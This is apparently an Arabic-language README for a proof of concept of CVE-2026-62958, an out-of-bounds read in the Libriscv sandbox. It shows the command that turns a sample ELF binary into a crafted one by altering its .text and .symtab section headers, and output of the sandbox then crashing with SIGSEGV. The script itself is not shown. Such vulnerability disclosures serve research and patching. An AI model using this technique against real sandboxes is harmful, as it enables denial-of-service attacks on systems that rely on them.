
إثبات المفهوم لثغرة CVE-2026-62958 التي توضح ثغرة قراءة خارج النطاق في بيئة الحماية Libriscv، مما يتيح تعطل بيئة الحماية عبر ملف ELF ثنائي مصمم.
ثغرة في Libriscv تسمح للمهاجم بتعطيل الصندوق الرملي (sandbox) باستخدام قراءة خارج الحدود (Out of Bounds Read).
لإنشاء Bad elf:
python3 poc.py samplefile poisoned_file
النتائج:
❯ python3 poc.py fib poisoned_file
Manipulating .text section header at offset 0x250
Manipulating .symtab section header at offset 0x710
❯ ./rvlinux poisoned_file
fish: Job 1, './rvlinux poisoned_file' terminated by signal SIGSEGV (Address boundary error)